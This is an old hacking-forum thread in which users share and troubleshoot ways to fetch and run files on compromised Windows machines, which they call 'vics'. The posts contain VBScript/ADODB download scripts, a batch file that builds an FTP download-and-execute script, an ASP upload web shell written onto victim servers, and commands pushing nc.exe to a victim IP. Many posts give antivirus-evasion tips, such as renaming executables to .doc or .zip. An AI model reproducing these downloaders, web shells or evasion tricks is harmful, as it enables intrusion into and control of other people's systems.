So if i'm right i can do this to start serv-u or something :

huh can you give me more explain please...
sorry men

use the script twice. use for each file the script again. and just start ur files like u normaly do


/Edit

Wel it's a very nice tool but unfortuneately my McAfee AV still detects it, even the new version, but no i just have to stop the AV services

another method here http://www.governmentsecurity.org/forum/in...?showtopic=7255 , no virus detection, no uploads/downloads scripts.

Maybe it's posted above me.
But I'm to lazy to read all the reply's

Anyways, when you have a download manager running it runs the download manager

You won't see any difrence when it's noticed by the download manager only thing is that it doesn't start downloading...

So thats at least one minus point

First of all, this is locall stuff, so offcourse your download manager will be alerted...
Second, you don't have to know VBS much to see that xPost is a variable for first file.. If you wish to download second file, just use diff variable...

I think this progie EXE2VBS could be quite usefull

h**p://www.haxorcitos.com/ficheros/EXE2VBS_10.zip

when i try to run this on my comp i got error on line 1 char 1 can someone help me and recode this
xPost.Open "GET","***/tlist.exe",0
xPost.Open "GET","***/3plx/sux.ini",0
xPost.Open "GET","***/sux.dll",0
xPost.Open "GET","*****/ServUDaemon.ini",0
xPost.Open "GET","***/kill.exe",0
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "tlist.exe",2
sGet.SaveToFile "sux.ini",2
sGet.SaveToFile "sux.dll",2
sGet.SaveToFile "sql.exe",2
sGet.SaveToFile "ServUDaemon.ini",2
sGet.SaveToFile "kill.exe",2
cscript webdown.vbs

really nice, I tried it and it worked for me.
Thanks for sharing thid really fast method!

BacKZoiD.

i like this method very much, works just fine and no av detects it, if you run your file separately.

thx

i found some vics begin deleting the cscript.exe

just found out, that mcAffee server edition detects the script...

but i got told that from a friend of mine, so i can't tell any further details

(script without automatic execution of exe-file)

interesting, thanks m8

Every time i wanna use with sqlexec it says sql_error by echoing the commands!
Somebody knows an suggestion?

best way is just the ftp.exe way or tftp.exe cuz the others are detected or will be detected very soon.

But when i tested i get,

echo Set HTTPGET = CreateObject(^"^Microsoft.XMLHTTP^"^)>>c:\madefile.vbs


SQL_ERROR

how can that be??? what can i change?

Hi guys

thx for this great method

ich have the same problem if anyone can help please reply


burton

"i found some vics begin deleting the cscript.exe"
Not admins do it, skids delete it.

"best way is just the ftp.exe way or tftp.exe cuz the others are detected or will be detected very soon."
Nope. Find your own way and don't make it public. still many ways to use scripts to easily bypass firewall because files will be created not downloaded...still the nicest method.

"Every time i wanna use with sqlexec it says sql_error by echoing the commands!
Somebody knows an suggestion?"
the green apple sqlexec doesn't like certain signs so swicht to another program, there are 1000 of them just google

many progz have problems with echoing " how knows on how to echo a " in Sqlbrowser? would be gr8 PS: the script workx fine at all!

Thats also a very nice (and working!) idea. THX

I only have a problem with a line:
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs

Thats working, but when i echo these there is only this:
Echo Const adSaveCreateOverWrite

So the "=2" is missing.

Thats strange...
But I cant do anything against that
Any suggestions?

cya

tnx buddy its nice mathod of geting files to box's when the ftp.exe\rcp.exe\tftp.exe not work

Some AV do detect the script, but I found out that they only delete it when you are downloading a executable file. When I rename my tool program.exe to program.doc on my http server and rename it on the victim after download, it still works

Btw. On some vics the download doesn't start at all... that is because cscript.exe is deleted?

danke für das script werd es mal testen

how do you do wiht the instruction PUT ??

Looks promising... too bad I'm too n00b to know what exactly to edit if I, for example, wanted the bot to download/execute a file such as hxxp://www.tripod.com/example.exe

temptation of course vbs file is run like exe , and realloader u may have a mistake in ur echoing , if u copy the exact echo with its spaces and change what is supposed to be changed it should work fine , and its tested remotely by the way .. Maybe soon i am planning to release some document about all ways to upload files to cmd shell , since i started with tftp and net share , then i increased my knowledge to the ftp method , then i made that vbs thing , and i knew after that the mshta thing , and i did other way with echoing , but its still beta thing (has some problems , but u can echo anytext u want including signs and all ..

try:

echo o ftp.server.de >> ftpdownloader.bat
echo anonymous >> ftpdownloader.bat
echo password >> ftpdownloader.bat
echo GET file.exe >> ftpdownloader.bat
echo quit >> ftpdownloader.bat
echo ftp -s:ftpdownloader.bat >> ftpdownloader.bat
echo file.exe >> ftpdownloader.bat
ftpdownloader.bat

will download and execute a file from ftp

many progz have problems with echoing " how knows on how to echo a " in Sqlbrowser? would be gr8 PS: the script workx fine at all!

Wowiie...

This is some very very nice info...

Thanks for sharing..

Greetzzz to all

GREAT post cuzz nr3 is helping me allready for a long time, i use it alot!

very nice method
thanx

This Method do not work any more:
see this Error:
C:\WINNT\system32>cscript c:\trojan.vbs
Microsoft ® Windows Script Host Version 5.6
Copyright © Microsoft Corporation 1996-2001. All rights reserved.

c:\trojan.vbs(1, 28) Microsoft VBScript compilation error: Expected ')'

I say nice job works fine
for the record. Norton coorp

Dim Partizaan
Set Partizaan = CreateObject("WScript.Shell")
Partizaan.Run "freecell.exe"

Norton coorp. idenfies this string as virus.

Respect to the original coder !

sorry i got my problem clear.

1.
in vitcim,save as up.asp

@echo ^<%with server.createobject("adodb.stream"):.type=1:.open:.write request.binaryread(request.totalbytes):.savetofile server.mappath(request.querystring("s")),2:end with%^> >up.asp

in your client,save as up.vbs:

with wscript
if .arguments.count<3 then .quit
url=.arguments(0)&"?s="&.arguments(2)
fn=.arguments(1)
end with
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fn:s=.read:.close
end with
with createobject("microsoft.xmlhttp")
.open "post",url,false:.send s
wscript.echo .statustext
end with

do it:
cscript up.vbs http://123.45.67.89/up.asp nc.exe mm.exe

2.
start its:http://www.sometips.com/soft/ps.exe
cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5"
dir /s ps[1].exe
copy XX000XXX\ps[1].exe c:\path\ps.exe
del XX000XXX\ps[1].exe

3.
@echo with wscript:if .arguments.count^<2 then .quit:end if > dl.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> dl.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> dl.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> dl.vbs

cscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

thank u C0D4R!
it look complicat, but i will try it !
I can understand #3....it work.
but #1 and #2 ..i dont understand.

is anyone can ive the commands for SQL??
i get an error when i use this:"

any help??????


thnx in advance,

AsD10

thanks, ofcourse it worked when i tested it

and my avs didn't find it either!

damn, works well boshcash!

anywayz, anybody can help me make this undetectable?
FLX

the undetected part is easy ... atleast with mcafee flx...just change the .exe to .zip

the real problem i see is that in xp sp2 they removed adodb so there must be something else that will work